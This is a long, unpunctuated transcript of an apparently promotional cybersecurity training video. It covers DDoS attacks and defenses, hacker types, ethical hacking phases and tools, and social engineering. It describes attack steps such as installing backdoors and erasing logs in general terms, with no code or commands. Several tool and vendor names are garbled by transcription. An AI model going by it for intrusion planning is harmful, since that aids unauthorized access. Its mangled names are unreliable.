Unfortunately this dummy address never responds this is carried out a number of times the target waits for the final step in the handshake and in turn it exhausts its resources in the process next up we have the application layer attack the main motive of this attack is
To bring down an online service or a website these attacks are comparatively smaller but silent application layer attacks are also known as layer 7 attacks and it not only targets the application but also the network and its bandwidth application layer attacks include get and post floods low and slow attacks and
More let’s have a look at the famous http flood attack as an example http flood is a type of distributed denial of service attack in which the attacker exploits legitimate looking http get or post requests to attack a web server or an application here large numbers of http requests
Flood the server resulting in denial of service http has generally two types of requests get or post a get request is used to retrieve information while a post request is often used when submitting a completed web form or when uploading a file usually http flood attacks are harder to detect and block
A http flood attack sends what appears to be legitimate http get or post requests to attack a web server or an application these flooding attacks often rely on a botnet now that we had a look at the types of ddos attacks let’s understand the measures we need to take up in order to
Prevent these attacks the first step is to acquire more bandwidth you must make sure that you have ample bandwidth to handle any spikes and traffic caused due to malicious activity currently with attackers being more careful having more bandwidth raises the bar which the attackers have to overcome before launching a successful ddos
Attack this is a good preventive step next make sure to develop a ddos response plan ready usually when a ddos attack takes place there is very less time to plan hence it is wise to define a plan in advance as it will avoid and minimize any impacts
To do this job first you would have to develop an incident response plan also make sure your data center is prepared and your team knows what to do the standard key elements include system checklist forming a response team which should include the list of internal and external contacts as well
And the last being securing your network infrastructure this can be done with the help of ips that is intrusion prevention systems which combine firewalls vpn load balancing and other layers of ddos defense techniques our third point is to configure network hardware against an attack at times small hardware configuration changes can
Help you prevent a ddos attack this is most often overlooked also make sure to protect your dns servers as attackers can bring down your website and web servers offline by attacking your dns servers next point is to leverage the cloud the conventional ddos mitigation solutions oversize the network bandwidth and
Require complex hardware which proves to be costly and also ineffective whereas cloud has greater bandwidth and resources cloud-based apps can absorb malicious traffic way before it reaches its intended destination therefore it is good to outsource ddos prevention to cloud-based service providers our fifth point involves monitoring your website traffic regularly for unusual activities
It is a great thing if your website gets millions of new visitors in nr but isn’t that also suspicious a sudden increase in traffic is an alarming situation hence have alerts set up in the event you exceed a threshold specific to the number of requests targeting your site
Considering the time and place of the inbound traffic is also a good step a ddos attack usually gives a few red flags before it happens your team should be wise enough to spot them beforehand the signs of such an attack for example will be your website being unresponsive or responding slowly intermittent
Website shutdowns or probably the user having problems accessing the website if these issues are prolonged then the network is likely experiencing a ddos and an action should be taken immediately the next step is to keep everything up to date this might sound basic but it goes a long way all the systems should
Be kept up to date to make sure that any issues or bugs are fixed it is always good to detect threats at an early stage finally you can make use of ddos prevention tools like inferva cloud fair f5 networks albert d dos and black lotus to name a few
These tools are very effective for example layer 3 and 4 protection absorbs an attack before it reaches the target server this is not achievable by using firewalls load balancers and routers taking an example of arbor ddos it is to be noted that it can deal with large volumes of malicious traffic without
Disrupting the regular traffic this software is used to mostly protect enterprise or web hosting services now let’s have a look at something interesting we will speak a bit about the digital attack map as you see on your screens it is a data visualization of ddos attacks across the
World it is built through a collaboration between google ideas and arbor networks you can have a look at it and explore the various features it has like which part of the world and when a ddos attack is happening you can also get all the stats related to the attack
Digital attack map lets you learn about past trends and find reports of outages happening on a given day make sure to check this out now that you know all about a ddos attack and if you are interested in becoming a cyber security expert and want to work on designing security
Systems and prevent cyber attacks then simply learn can help you achieve your dreams simply learn provides a cyber security expert master’s program with foundational intermediate and advanced security skills through leading certification courses including security plus ceh cism cissp and ccsb with the increasing number of job opportunities in the field of cyber
Security this certification course will provide to be an advantage there are no prerequisites for this program however knowledge of any programming language is recommended but again not mandatory let’s see how do we become a cyber security expert so essentially who is a cyber security expert a cyber security expert is an
Individual employed by an organization to protect their infrastructure right so this person is responsible to identify potential flaws identify what threats the organization faces and then streamline or create or design or architect methodology which is going to protect all the assets that the organization has so this is going to
Happen through a variety of techniques such as finding weaknesses so vulnerability management where you run vulnerability scanners identify potential flaws in the organization’s infrastructure could be applications could be servers could be desktops could be operating systems uh could be anything could be network-based flaws as well and then
You’re going to monitor these systems you’re going to look at the data flow that is going to the internet through the network to the intranet rather and then you’re going to check if there is anything malicious going on in that network so over these techniques you’re basically
Going to monitor it on a day-to-day basis on a regular basis and you’re going to try to identify if anything out of the ordinary is happening right after you find the weakness you’re going to test those weaknesses to identify the complexity of those weakness to validate those weakness actually exist and then
You’re going to repair them you’re going to patch them you’re going to install updates or you’re going to prevent you’re going to install mechanisms like firewalls or antiviruses to mitigate those uh weaknesses and you’re going to uh thus resulting in strengthening the areas where an attack may have occurred
Let’s see the domains in cyber security now when we say domains in cyber security in the previous slide we were discussing where these attacks may happen like applications infrastructure uh network so let’s see these domains in details asset security now when we say assets assets could be applications
Could be networking devices could be computers could be routers it could be wireless access points and these uh all these devices have their own operating systems they have their own functionality and it is important that we look at the security of each and every asset that the organization owns security
Architecture and engineering now not everyone can just walk in an organization uh and then say let’s start implementing as uh in implementing security in a particular manner we have to standardize the security in such a way where the security is constant for a long period of time and is consistent
Right so for that to happen there is an architecture an engineering phase where we are going to create a plan of how the security needs to be implemented for example if i determine to install a particular antivirus i have to ensure that the same antivirus is installed on
All the systems in the organization i cannot have different kind of antiviruses installed that do not talk to each other or do not report properly to the proper owner so we have to create policies procedures and we have to implement them in a standardized manner for our security to work properly
Communication and network security now with cloud computing coming in and hybrid clouds happening where you got a deployment of a physical infrastructure talking to something that is on the cloud let’s say aws or microsoft azure right and data flows are happening globally these days uh you have to be
Very careful how these data are going to be transmitted across the network thus you have to create those paths and ensure that those parts are monitored properly are regulated properly and do not have any data leakages similarly identity and access management who is accessing my data are they authorized to
Access my data and if yes how am i going to authenticate them how am i going to track them home how am i going to hold them accountable for whatever they have done even if a person is authorized to do something we have to hold them accountable for that activity so that if
Something something happens later on we can identify who made that change so the identity and access management module will consist of us creating groups policies users roles and interlinking them with the assets to ensure that only authorized people are able to access those devices security operations on a
Day-to-day basis we need to monitor the security of the organization for example if today i start facing a denial of service attack or somebody starts a password attack on my organization where they’re trying to crack somebody’s password there should be some internal mechanisms that are in place which will
Try to identify these attacks one the appropriate administrator and that administrator will walk in and try to investigate that attack so day-to-day operations are a must security assessment and testing now that we are all have these mechanisms in place are they going to remain constant for the
Rest of our lives no i.t is a ever evolving scenario so we need to assess and test our security controls on a regular basis to ensure that there are no gaps left what i configure today may be irrelevant tomorrow so i have to constantly keep on looking at the latest
Security trends the latest vulnerabilities that are being identified the patches that are being installed and i have to compare my infrastructure to all of these to see that i am compliant with the latest security standards software development security so if you’re an organization who’s developing software and who’s
Going to sell that software to end users security becomes a huge part because the end user or the buyer if it is an organization is going to ask what kind of security testing was done in the application so that brings us to a software development life cycle which a
Life cycle which talks about how you’re going to create that code how you’re going to test that code ensure that the code is secure enough so you need to follow secure coding practices and you’re going to test the software over and over again till you are satisfied
With the outcome and then security and risk management now when we come to risks risks are basically events that may occur compromising the security of an organization so it is very important that we identify these risks we map these risks we verify how that risk is going to impact the business and then
Try to figure out security controls to mitigate that risk or bring it down to manageable aspects so that’s a lot of talk that’s a lot of domains that’s a lot of attacks that we have discussed now let’s see what kind of courses and certifications are available for us to enhance our careers
And address all of these domains all of these attacks so starting off from a technical perspective where we are going to look at ethical hacking or security where we are going to assess and do a liberty assessment and penetration test there are certifications from comptia like security plus or from ec council
Which is the certified ethical hacking training which basically allows us to become vulnerability assessment and penetration testing experts so we’ll be technically be testing each and every device and trying to hack those devices to see if that vulnerability is real and what can be attained out of that
Vulnerability cissp is very high level is a very high level certification that normally is considered as a management level certification right so just to get certified yourself you need at least 5 years of experience in the iit security field this is where you get certified and you’re basically a chief information
Security officer where you’re going to develop policies procedures and security control mechanisms and you’re going to standardize the security policy of the entire organization then you’ve got the cisa or also now known as the csa certified information systems auditor it is from an organization called asaka it’s more on the system side where
You’re going to audit systems and you’re going to verify that they are adhering to the policies that you have implemented the cism or system is a certified information security manager this is again a project based oriented approach where you’re going to manage the security of an organization and you’re going to look
At all the daily operations of the security operations center and you’re going to maintain and manage all of those functions overall when we talked about risk assessment and risk strategy for that we’ve got the ca crisc which is a certified in risk and information systems control now for these
Certifications this is more on the business side of everything where you understand the business processes you understand the business requirements and based on those business requirements you compare the technical implementations of compute of computing powers that you have implemented and then you are going to compare how those technical aspects
Can be converted into a risk for example a vulnerability assessment identifies a possible sequel injection attack now technically it becomes technically it becomes a big risk however which system is we are being affected if that system gets compromised what kind of losses is the organization looking at how much are
They going to be what kind of losses the organization are looking at are they looking at lawsuits from their customers are they looking at penalties from regulatory authorities so that risk that implied risk that this if this vulnerability is hacked that is the aspect that you want to look at when
You’re looking at risk information and controls similarly you have ccsp this is a certified cloud security professional certification so this is especially for people who want to deal with the cloud let it be a public cloud a private cloud or a hybrid cloud this certification gives you an architectural overview over different
Aspects of cloud and how you want to implement security in a cloud-based scenario so simplylearn offers all of these certifications with trainings from certified professionals so there’s a master’s program from simplylearn which talks about becoming a cybersecurity expert which includes all of these trainings once you have these kind of trainings
And you get those certifications on your profile that’s where you’re basically a cyber solutions or cyber security expert and you’ll be designing and developing security policies structures architectures for various organizations and helping them enhance the security of their infrastructure we humans are highly tech savvy in today’s times
With the extensive use of the internet and modern technologies there is a massive challenge in protecting all our digital data such as net banking information account credentials and medical reports to name a few have you heard about the deadly wannacry ransomware attack the attack happened in may 2017 in asia
And then it spread across the world within a day more than 230 000 computers were infected across 150 countries the wannacry cryptoworm encrypted the data and locked the users out of their systems for decryption of the data the users were asked for a ransom of 300 to 600 in bitcoin
The users who use the unsupported version of microsoft windows and those who hadn’t installed the security update of april 2017 were targeted in this attack the wannacry attack took a toll on every sector top tier organizations like hitachi nissan and fedex had to put their businesses on hold as their
Systems were affected too now this is what you call a cyber attack to prevent such attacks cyber security is implemented we can define cybersecurity as the practice of protecting networks programs computer systems and their components from unauthorized digital attacks these illegal attacks are often referred to as hacking hacking refers to exploiting weaknesses
In a computer network to obtain unauthorized access to information a hacker is a person who tries to hack into computer systems this is a misconception that hacking is always wrong there are hackers who work with different motives let’s have a look at three different types of hackers black hat hackers are individuals who
Illegally hack into a system for monetary gain on the contrary we have white hat hackers who exploit the vulnerabilities in a system by hacking into it with permission in order to defend the organization this form of hacking is absolutely legal and ethical hence they are also often referred to as ethical hackers
In addition to these hackers we also have the grey hat hackers as the name suggests the color gray is a blend of both white and black these hackers discover vulnerabilities in a system and report it to the system’s owner which is a good act but they do this without seeking the owner’s approval
Sometimes grey hat hackers also ask for money in return for the spotted vulnerabilities now that you have seen the different types of hackers let’s understand more about the hacking that is legal and valid ethical hacking through an interesting story dan runs a trading company he does online training with the
Money his customers invest everything was going well and dan’s business was booming until a hacker decided to hack the company’s servers the hacker stole the credentials of various trading accounts he asked for a lump sum ransom in exchange for the stolen credentials dan took the hacker’s words lightly and didn’t pay the hacker
As a result the hacker withdrew money from various customers accounts and dan was liable to pay back the customers dan lost a lot of money and also the trust of his customers after this incident dan gave a lot of thought as to what could have gone wrong with the security infrastructure in his
Company he wished there was someone from his company who could have run a test attack to see how vulnerable systems were before the hacker penetrated into the network this was when he realized he needed an employee who thinks like a hacker and identifies the vulnerabilities in his network before an outsider does
To do this job he hired an ethical hacker john john was a skilled professional who worked precisely like a hacker in no time he spotted several vulnerabilities in dan’s organization and closed all the loopholes hiring an ethical hacker helped dan protect his customers from further attacks in the future
This in turn increased the company’s productivity and guarded the company’s reputation so now you know hacking is not always bad john in this scenario expose the vulnerabilities in the existing network and such hacking is known as ethical hacking ethical hacking is distributed into six different phases let us look at
These faces step by step with respect to how john our ethical hacker will act before launching an attack the first step john takes is to gather all the necessary information about the organization’s system that he intends to attack this step is called reconnaissance he uses tools like nmap and h-ping for this purpose
John then tries to spot the vulnerabilities if any in the target system using tools like nmap and expose this is the scanning phase now that he has located the vulnerabilities he then tries to exploit them this step is known as gaining access after john makes his way through the
Organization’s networks he tries to maintain his access for future attacks by installing back doors in the target system the metasploit tool helps him with this this phase is called maintaining access john is a brilliant hacker hence he tries his best not to leave any evidence of his attack
This is the fifth phase clearing tracks we now have the last phase that is reported in this phase john documents a summary of his entire attack the vulnerabilities he spotted the tools he used and the success rate of the attack looking into the report dan is now able
To take a call and see how to protect his organization from any external cyber attacks don’t you all think john is an asset to any organization if you want to become an ethical hacker like john then there are a few skills that you need to acquire
First and foremost you need to have a good knowledge of operating environments such as windows linux unix and macintosh you must have reasonably good knowledge of programming languages such as html php python sql and javascript networking is the base of ethical hacking hence you should be good at it
Ethical hackers should be well aware of security laws so that they don’t misuse their skills finally you must have a global certification on ethical hacking to successfully bag a position of an ethical hacker like john few examples of ethical hacking certification are certified ethical hacker certification ceh comptia pentest plus
And licensed penetration tester certification to name a few simply learn provides a cyber security expert masters program that will equip you with all the skills required by a cyber security expert you could have a look at it by clicking the link in the description the endless growth of
Technologies in this area is directly proportional to the number of cyber crimes cyber crimes are estimated to cost six trillion dollars in 2021 hence to tackle these cyber crimes organizations are continuously on the lookout for cyber security professionals the average annual salary of a certified
Ethical hacker is 91 000 in the us and approximately rupees seven lakhs in india so what are you waiting for get certified and become an ethical hacker like john and put an end to the cyber attacks in the world so let’s talk about hacking and what exactly hacking is hacking refers to exploiting
Weaknesses in a computer network to obtain unauthorized access to information a hacker is a person who tries to hack into computer systems now here there are some keywords that we need to understand first and foremost exploit when you are exploiting weaknesses weaknesses are technically called vulnerabilities which are basically design flaws misconfiguration
Errors usage of default usernames and passwords which have not been modified so any misconfiguration or anything that has been left behind by a security administrator that can be misused which means exploited by a hacker to gain unauthorized access so the next term is unauthorized access something that
You’re not allowed to do and when you say a hacker is a person who tries to hack it’s basically a person with malicious intent trying to gain access to a system or a resource that they are not authorized to access in the first place how do they do it they find a
Vulnerability that is a weakness or a flaw and then they misuse it to gain access to that particular network so here in the diagram you can see that a sender on the left hand side is trying to send some data to the receiver on the right-hand side the hacker would try to
Gain unauthorized access to the transmission that is being sent and would try to capture the data packets and read the secrets within let’s look at a business case scenario into hacking now there is an organization everybody is going around their own business when they realize that their systems may have
Been compromised now they’re trying to look at the customer data to ensure that that has not been compromised and trying to assure the customers however they do realize that some customer data has been lost and even the company reports have been modified as well now this is the
Scenario where there have been some security controls in place and those controls have been identified they realized that there is an attack that has happened and based on that attack they have realized that the data has now been compromised and the records have been modified by the hacker which means that the data
Is no longer trustworthy and thus cannot be used by the business for any legal transactions so then the hacker gives a call to the organization or gets connected to the organization demanding a ransom for the data to be replaced to be taken back into the original state
Where it was trusted and thus the organization can utilize it for business transactions the organization has probably no backup so they decide that they want to pay the lump sum to the hacker to restore that data so that they can continue on with the business does money exchanges and the hacker is able
To restore that data and the business continues that as usual however the activity here of a hacker trying to leverage the misconfiguration of the weaknesses in the organization’s security thus being able to hack them and make these ransomware demands so the company then wants to figure out even if
Having a security system in place how was the hacker able to hack their systems thus one of the employees comes up with a brilliant idea of identifying vulnerabilities in the network to proactively search for any flaws that have been left behind so that they can plug those laws and nobody can misuse them
Thus they figure out that they want to hire an ethical hacker who would help them identify the security posture of the organization identify the weaknesses vulnerabilities and flaws and help them remedy those laws so that in future scenarios these scenarios will not happen so before we go into an ethical
Hacker let’s understand what are the types of hackers so what are the types of hackers hacker is a technically skilled person who is very adept with computers they have good programming skills they understand how operating system works they understand how networks work they understand how to identify flaws and vulnerabilities
Within all of these aspects and then they understand and know how to misuse these flaws to get a outcome which would be detrimental to the health of the organization so there’s six type of hackers that have been identified black hat hackers white hat hackers grey hat script kiddies nation’s players sponsored hackers and
Activists so black hat hackers are basic basically uh the malicious hackers who have malicious intent and have criminalistic tendencies they want to harm the organization by hacking into their infrastructure by destroying their infrastructure by destroying the data so that they can gain from it from a monetary perspective these guys are also
Known as crackers the main aspect of these people are that they have malicious intent they try to do unauthorized activities and they try it for personal gain another important aspect to remember is that a black hat hacker will always try to hide their identity they will prove their online
Digital identity by masking it by spoofing their ip addresses mac addresses and try to remain anonymous on the network a white hat hacker on the other hand is also an ethical hacker or a security analyst who is an individual who will do exactly the same thing that
A black hat hacker would do minus the malicious intent plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities so they are authorized to act on the company’s behalf they are authorized to do that activity which would help the
Company identify those flaws and thus help the company mitigate those flaws improving on their security portion so these uh these kind of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks grey hat hackers is a blend of both white hat and black hat hackers so here they can work
Defensively and offensively both they can accept contracts from organizations to increase their security posture at the same time they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity script kitties are people uh who are technically not much aware about what
Hacking is uh they rely on existing tools that have been created by other hackers they have no technical knowledge of what they’re doing it’s just a hit or miss for them so they just get their hands on a tool they try to execute those tools uh if the hack works it
Works otherwise it doesn’t so these people are basically who are noobs or newbies who are trying to learn hacking or uh just uh people who with malice’s intent who just want to have some fun or trying to impress people around then we have the nation or the state-sponsored
Hackers as the name suggests these hackers are sponsored by their government now this may not be a legitimate job but most of the governments do have hackers enrolled in their pay on on their organizations to spy on their enemies to spy on various countries and try to figure out uh the aspirations of
Those countries so this is basically a spying activity where you’re technically trying to get access to other countries resources and then try to spy on them to figure out what their activities have been or what their future plans have been and then we have the hacktivist who’s an individual who has a political
Agenda to promote and they promote promoted by doing hacking so these guys what is the difference between a black hat hacker and a hacktivist the black hat hacker may try to hide their identity the hacktivist will claim responsibility of what they have done so for them it’s a political agenda
Political cause and they will try to hack various organizations to promote their cause they would probably do this by defacing the website and posting the messages that they want to promote on these websites so what exactly is ethical hacking then we have discussed the types of hackers we have identified
A malicious hacker as a black hat hacker with the intent of doing harm to an organization’s network for personal gain we have discussed what the ethical hacker is so an ethical hacker would be doing the same activity but in an authorized manner so they would have legal contracts that they would be
Signing with the organization it would give them a definite scope of what they are allowed to do and what they are not allowed to do and the ethical hackers would function within those scopes would try to execute those test scenarios where they would be able to identify those flaws or those system
Vulnerabilities and then they would be submitting a report to the management of what they have found they would also help the management to mitigate or to resolve those weaknesses so that nobody else can misuse them later on they might use the same techniques and the same tools that black hat hackers do however
The main difference here is that these guys are authorized to do that particular activity they’re doing it in a controlled manner with the intent of helping the organization and not with the intent of personal gains so who’s an ethical hacker again an ethical hacker is a highly intelligent highly educated
Person who knows how computers function how programming languages work how operating systems work they can troubleshoot they’re technically very adept at computing they understand the architecture they understand how various components in a computer work they can troubleshoot those components and they can basically be very good with programming as well now
When i say programming we don’t want the ethical hacker to be a good developer of applications we want them to understand programming in such a way that they can create scripts they can write their own short programs like viruses worms trojans or exploits which should help them achieve the objective that they
Have set out for so uh here you can see the ethical hacker there are individuals who perform a security assessment of the companies with the permission of cons concerned authorities so what is the security assessment a security assessment is finding out the exact security posture of the organization by
Identifying what security controls are in place how they’ve been configured and if there are any gaps in the configurations themselves so an organization will hire a heckler hacker they they would give the ethical hacker the information about what information is or what security controls what firewalls now what idss ipss introgen
Detection or intuition prevention systems antiviruses are already in place and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization what is the need of an ethical hacker the need of an ethical hacker is proactive security the
Ethical hacker would identify all the existing flaws in an organization and try to resolve those laws to help secure the organization from black hat hackers so ethical hackers would prevent hackers from cracking into an organization’s network by securing the organization by improving on their security on a
Periodic basis and they would also try to identify system vulnerabilities network vulnerabilities or application level vulnerabilities that would have been missed or have already been missed and then tried to figure out a way of plugging them or resolving them so that they cannot be misused by other hackers they would also
Analyze an enhanced organization security policies now what are policies policies are basically documents that have been created by an organization of rules that all the employees need to follow to ensure that the security of an organization is maintained for example a password policy a password policy would
Help users in an organization to adhere to the standards the organization has identified for a password complexity for example a password when a user is creating them should adhere to standards where they are using random words they are they contain the alphabet a through z uppercase and lowercase 0 through 9 as
Numerics and special characters and they’re randomized so that the password becomes much more stronger to prevent from brute force attacks so what would an ethical hacker do at this point in time they would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are
Possible and if any of these passwords can be cracked they will ensure that all the employees are following the policies and all the passwords are as secured as the policies want them to be if there are any gaps in the policies or the implementation of the policy it is the
Ethical hacker’s responsibility to identify those gaps and warn the organization about it similarly they would also try to protect any personal information any data that is owned by the organization that is critical for the functioning of the organization and they’ll try to protect it by from falling into the hacker’s hands now what
Are the skills that are required of an ethical hacker these are the following skills so first and foremost they should have good knowledge with operating systems such as windows linux unix and mac now when we say knowledge about operating systems it’s not only about how to use those operating systems but
How to troubleshoot those operating systems how these operating systems work how these operating systems need to be configured how can they be secured for example securing an operating system is not only installing a firewall and an antivirus but you need to configure permissions on an operating system of
What users are allowed to do and what users are not allowed to do for example limiting the installation of applications how are we going to do that we need to go into the system center the security center of windows and we need to configure security parameters over there of what are acceptable softwares
And what are not same with linux and mac softwares operating systems so we need to know how we can secure these operating systems similarly all of these would have desktop versions and server versions of operating systems as an ethical hacker we need to know the desktop and server versions both how to
Configure them and how to provide services within the organization on these servers so that they can be consumed in a secure manner by all the employees at the same time they should also be knowledgeable of programming languages or scripting languages such as php python ruby html for programming if
You will because web servers come into the picture so again they should not be great developers where they can create huge applications but they should be able to develop scripts understand those scripts analyze those scripts and figure out what the output should be of those scripts to achieve the hacking goals
That they have set out for an ethical hacker should have a very good understanding about networking no matter whether you’re in application security you’re in network security or you’re in host-based security since a computer will always be connected to a network either a local area network like a lan
Or the internet we should know how networking works we should know the seven layers of the osi model we should know which protocols work on those seven layers we should identify the tcp model and how osi model can be mapped to the tcp model we should understand how tcp
And udp work how how each and every protocol is crafted how they are supposed to behave for us to analyze and understand any network network-based attacks we should be very good in security measures so we should know where those vulnerabilities would lie what are the latest exploits available
In the market and we should be able to identify them we should be able to know the techniques and the tools of how to deal with security how to analyze security and then how to implement security to enhance it as well along with that it is important that a
Security analyst or ethical hacker is aware of the local security laws and standards why is that because an organization cannot do any illegal activity whatever responses that they have whatever security mechanisms whatever security controls they will implement they need to be adhering to the local law of the land they should be
Legal in nature and should not cause undue harm to any of the employees or any of the third party clients that they are dealing with so the ethical hackers should be aware of what security laws are before they implement security controls or even before they start testing for security controls and all of
These should be backed up by having a global certification or a globally valid certification related to networking related to security ethical hacking the law of the land anything and everything maybe even programming it’s good to have a certification in php pearl python ruby and so on so forth why because most of
The organizations when they hire ethical hackers look out for these certifications especially globally valid certifications so that they can be sure or they can be assured that the person that they are hiring has the required skill set so let’s talk about a few of the tools that a ethical hacker would
Utilize uh in the testing scenarios to be honest there are hundreds of tools out there what you see on the screen is just a few examples of them nessus is a vulnerability scanner what is a vulnerability scanner it is an automated tool that is designed to identify vulnerabilities within hosts
Within operating systems within networks so they come with their ready-made databases of all the vulnerabilities that have already been identified and the scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host or the operating system or on the network
Similarly there would be application scanners like acunetix or arachne that would help you scan applications and identify flaws within those applications as well now all of these are automated tools the essence of ethical hacker is when these tools churn out the reports the ethical hacker can understand these reports
Analyze them identify the flaws and then craft their own exploits or use existing exploits in a particular manner so that they can get access or they can bypass the access or security controls mechanisms that are already in place how can they do that with the tool called
Metasploit you see that big m there on the right hand side that m logo is for a tool called metasploit which is a penetration testing tool what is a penetration testing tool it is that tool that will allow a ethical hacker to craft their exploits or choose their exploits for the vulnerabilities that
Have been identified by nessus since we are interacting with computers we will always be interacting using tools right so the first tool necess identifies the flaws and the possible list of vulnerabilities we do a penetration test using metasploit to validate those flaws and to verify that those flaws actually
Exist and try to figure out the complexity of those flaws and that’s where metasploit helps us do that wireshark could be used in the background while we are doing both the activities using nessus or metasploit to keep a track of what packets are being sent and by received on the network
Which will help us analyze those packets so whenever i run an ss scanner i would run a wireshark in the background it will capture the data packets and i can go through those data packets and analyze that data package to identify what nss is actually trying to do
Similarly when i try to attack a machine using exploit on metasploit i will keep on wireshark running in the background to capture the data package that have been sent and the responses that i have received from the victim so that i can also go through those packets and
Analyze the responses and analyze the attack whether it was successful to what extent was it successful and basically will also give me a validation of proof of the activity that has happened nmap is another automated tool that allows me to scan for open ports and protocols so why would i use nmap
Because pro ports and protocols become an entry point for a hacker to gain access to devices for example when we connect to a web server we connect through a web browser but we automatically connect to port 80 using http and port 443 is using https so if
I’m connecting to a web server using https it is safe to assume that port 443 on the web server is open to accept those connections similarly there would be other services that may be left open on the web server because nobody thought about configuring it or they misconfigured the web server and they
Left unwanted services running so nmap will allow me to scan those ports and services and allow me to understand what services are being offered on that server so then i can start analyzing that server identify those flaws within those services and then try to attack them if the application that i’m
Analyzing is connected to a database and i want to do a sequel injection attack or if i if nessus tells me that there is a sequel injection attack that may be possible on that particular application i can use an automated tool called sql map or sql map that would allow me to
Automatically craft all the queries that are required for a sql injection attack and help me do that attack at the same time so here i do not have to manually create my own queries the sql map tool would automatically create them for me what i would do is i would use nessus to
Identify that particular flaw if necessary for that flaw i would then go use the tool sql map configure it to attack that particular web server and when i fire off the tool it will then automatically start directing queries sql injection queries to the database to see if those uh databases are vulnerable
And if yes what data can be retrieved from those databases so all of these tools in a nutshell would help me hack networks applications operating systems and host devices and this is what an ethical hacker does they use these kind of tool sets they identify what attacks
They need to do they identify the right tool for that particular attack and they write their exploits they create those attacks and then they start attacking analyze the response and then give a report to the management providing them feedback about how the attack was created or crafted what was the response
To that attack and whether the attack was successful or not if successful they would also give recommendations of what to do to prevent these attacks from happening in the future so when we are doing these attacks or when we want to launch these attacks what is the process
That we would follow so there are six steps that we would do as an ethical hacker if you are just a hacker you probably wouldn’t do the sixth step which is a reporting step so the first step that would be done is the reconnaissance phase which is the information gathering phase which is
Very important from ethical hackers perspective or a hacker’s perspective because if i want to attack someone or something as a digital device i need to know what i’m attacking i need to know the ip address of the device the mac address of those devices i need to know
The operating system the build or the version of that operating systems applications on top the versions of those applications so i know what i’m attacking for example if i if i want to attack a server i assume it’s a windows based server and i use a particular tool
To attack it but it actually turns out to be a linux way server my attacks are going to be unsuccessful so i need to focus my attack based on what is there at the other end so in my information gathering phase i want to identify all of that information once i have that
Information done i’m going to scan those servers using tools like nmap that we just talked about and we’re going to try to see the open ports open services and protocols that are running on that server that can give me possible entry points within the network or within the
Device or within the operating system at the same time along with the scanning with nmap i would run a vulnerability scanner the nexus vulnerability scanner we talked about or acunetix for applications and then i would try to identify vulnerabilities in those applications operating systems or networks once i have identified those
Vulnerabilities in the scanning phase i would then move on to the gaining phase where i would then craft my exploits or choose existing exploits and start attacking the attacking the victim at this point in time if my attack is successful i will probably have gained access by either tracking passwords or
Escalating privileges or exploiting a vulnerability that i may have found during the scanning phase once i have gained my access i want to maintain my access why because the vulnerability may not be there for long maybe somebody updated the operating system and hence the flaw was no longer exist or existing
Or somebody change the password that we i may have cracked does i no longer have access so what do i do to maintain my access i install trojans or backdoor entries to those systems using which i can secretly in a covert manner get access to those devices at my own will
At my own time as long as those devices are available over the network so that’s where i maintain my access i have hacked them now i want to maintain my access so i install a software which would give me a backdoor entry to that device no
Matter what once i have done this i want to clear my track so whatever activity that i’ve been doing for example installing a trojan a trojan is also a software that would create directory directories and files once installed on the victims machine so i want to hide
That if i have access data stores if i have modified data i want to hide that activity because if the victim comes to know that something has happened they would start they would start increasing their security parameters they might start scanning their devices they may take them offline thus my hack would no
Longer be efficient the reason i’m clearing my tracks is that the victim doesn’t find out that they have been hacked or they have been compromised or even if they do find out that they’ve been compromised they cannot trace the compromise back to me so i would be
Deleting references of any of the ip addresses or mac addresses that i may have used to attack that particular device and this is where i will be able to identify where those logs were created where those traces are once i take off those traces the victim would
Not be any wiser of whether they have been compromised or who compromised their system and if i am successful at all of these stages or what to whatever extent the success that i’ve achieved in any of these stages i would then create a report based on that and i would
Report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities for example we identified 10 different flaws there were 20 different attacks that we wanted to do what attack did we do what
Was the outcome of that attack what was the intended or or the expected output of that attack i’ll create a report which would give a detailed analysis of all the steps that were taken along with screenshots and evidences of what activity was conducted what was the output what was the expected output and
I would submit that report to the management giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated so that the security can be enhanced so these are the six steps that the ethical hacking process would take uh just going through this
Uh reconnaissance is where you’re going to use hacking tools like nmap hp to obtain information about targets there are hundreds of tools out there depending on what information you want then in scanning again nmap nexpose these kind of tools to be utilized to identify open ports protocols and
Services in gaining access you’re going to exploit the vulnerability by using the metasploit tool that we talked about in the previous slides in the maintaining access you’re going to install backdoors you can use metasploit at the same time you can craft your own scripts to create a trojan and install
It on the victim’s machine once you have achieved that clearing tracks is where you’re going to clear all evidences of your activity so that you do not get caught or the victim doesn’t even realize that they have been hacked and once you have done all of this we are
Going to create reports that are going to be submitted to the management to help them understand the current security evaluation of their organization so now let’s see how we can hack using social engineering now what is social engineering social engineering is the art of manipulating humans into revealing confidential information which
They otherwise would not have revealed so this is where your social skill and your people skills come into the picture if you are able to communicate effectively to another person they would probably give up more information that they intended to give out let’s take a
Look at examples right if you see on the screen fishing activity what is phishing we receive a lot of frequents on a regular basis we have always received those emails where we have won a lottery of a few million dollars but we have never realized that we didn’t purchase a
Lottery to win a lottery in the first place we have always had those nigerian frauds where a prince died in some south african country and u out of seven billion people on the planet have been identified where they want to transfer a few hundred million dollars through your
Account and they want to give you fifty percent of that money in return as thank you so some very basic attacks where you go on to websites and there’s a banner flashing at you saying congratulations you’re the one millionth visitor to this website click here to claim your price
All of these are social engineering attacks phishing attacks fake websites fake communications being sent out to users to prey on their gullibility most of humans always have that dream of striking it rich winning a huge lottery once and for all and living their life lavishly ever after but sadly in the
Real world that’s not that doesn’t happen that often and if you’re receiving those males it is very important that you first research the validity of those those communications before you even want to act upon them so why are humans susceptible to social engineering because humans have emotions
Machines do not try pleading with a machine to give you access to a account that you have forgotten a password to the machine wouldn’t even know what you’re doing try pleading with a human sympathy or empathy where you could try to create a social injury attack where
You can plead with them saying if i do not get access to this account immediately i might lose my job and then that would put my family into problems somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that
Account it’s how good the attack is and how convincing you are for the success of this attack to happen so what is a familiarity exploit attackers interact with victims to gain information which will benefit the attackers to crack credentials as passwords if we want to
